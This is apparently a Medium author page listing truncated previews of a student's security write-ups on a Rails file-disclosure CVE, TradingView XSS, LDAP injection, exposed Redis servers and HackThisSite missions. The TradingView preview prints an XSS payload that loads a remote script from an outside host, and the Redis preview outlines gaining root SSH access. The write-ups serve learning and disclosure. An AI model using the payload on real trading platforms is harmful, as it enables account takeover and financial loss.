Image for post
Image for post

Rails is a web application development framework written in the Ruby programming language. It is designed to make programming web applications easier by making assumptions about what every developer needs to get started.

[CVE-2019–5418] description: NVD

There is a File Content Disclosure vulnerability in Action View (Rails) <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed. Versions Affected: All. Not affected: None. Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1 The impact is limited to calls to render which render file contents without a specified accept format…


Image for post
Image for post

TradingView has popular charting libraries which are used in many online trading platforms for stocks or cryptocurrencies. This vulnerability is a fairly new XSS vulnerability. This vulnerability could bypass Cloudflare or other defense mechanism and cause financial losses due to account request forgery or malicious manipulation. We are going to talk about the vuln and the mitigation.

0x01 Vulnerability and Attack

Since TradingView’s library is widely-used, we can easily find a test target amongst stock exchange or cryptocurrency exchange platforms. Now let’s try to trigger the alert dialog.

After a little bit trying and looking at the code, we have the payload.

Payload

#disabledFeatures=[]&enabledFeatures=[]&indicatorsFile=http://xss.rocks/xss.js


Image for post
Image for post

This is a straight-forward company directory. First thing came to our mind was SQL injection without thinking too much about the challenge name (because it was a 50-pt challenge…). After trying a bunch of SQL injection quickly we suddenly realized this is LDAP injection (dah), so we put * as search query to confirmed this should be LDAP injection.

LDAP Injection:

LDAP Injection is an attack technique used to exploit web sites that construct LDAP statements from user-supplied input.

Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating X.500 directory services.

The web app looks…


Image for post
Image for post

Redis, is an open source, widely popular data structure tool that can be used as an in-memory distributed database, message broker or cache. Since it is designed to be accessed inside trusted environments, it should not be exposed on the Internet. However, some Redis’ are bind to public interface and even has no password authentication protection.

Under certain conditions, if Redis runs with the root account (or not even), attackers can write an SSH public key file to the root account, directly logging on to the victim server through SSH. …


Image for post
Image for post
hackthissite.org

Before my write-up, I want to mention that I read some well-written write-ups/tutorials after solving the Basic Missions and they do a good job guiding you to the right direction without spoilers. And there are a ton of this kind of well-written write-ups out there, you should read some of them just too see how others attack the same problem and their angles.

Basic Mission Tutorial 1–10 — HackThisSite

1–10 Basic Mission guide, that is completely noob friendly — HackThisSite

Basic 1

Like it says, it’s “The Idiot Test”. The password is hidden in HTML source code.

Basic 2

I’m sure when everyone reads…


Image for post
Image for post

Have you ever heard of the Google Games? Get ready to have some fun! This “in a box” version of the Games includes head-to-head team competitions in a series of challenges including trivia, puzzles, word association, and coding.

At The Google Games RPI, competitors will compete against other students for victory in challenges that test your brains and creativity to their limits! It’s a continuum of fun as teams of five go head to head in rigorous events: trivia, puzzles, word association, and coding competitions. Teams of five undergraduate studets will be competing for fun Google swag prizes.

I attended…

Victor Zhu

A Computer Science Student @ Rensselaer Polytechnic Institute who is intrigued by Cybersecurity. Favorite sport: Pentesting.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store